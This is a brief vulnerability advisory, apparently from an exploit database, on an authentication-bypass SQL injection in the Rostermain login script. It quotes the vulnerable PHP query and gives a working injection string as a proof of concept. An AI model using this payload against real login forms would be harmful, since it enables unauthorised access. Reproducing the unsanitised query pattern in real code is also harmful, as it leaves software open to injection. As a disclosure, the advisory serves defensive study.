[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/ [+] Vuln Code : [index.php] if ($_POST['userid'] && $_POST['password']) { // if the user has just tried to log in $logquery = "select * from users " ."where username='$userid' " ." and passwd='$password' "; [+] PoC : username : ' or' 1=1 password : ' or' 1=1
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论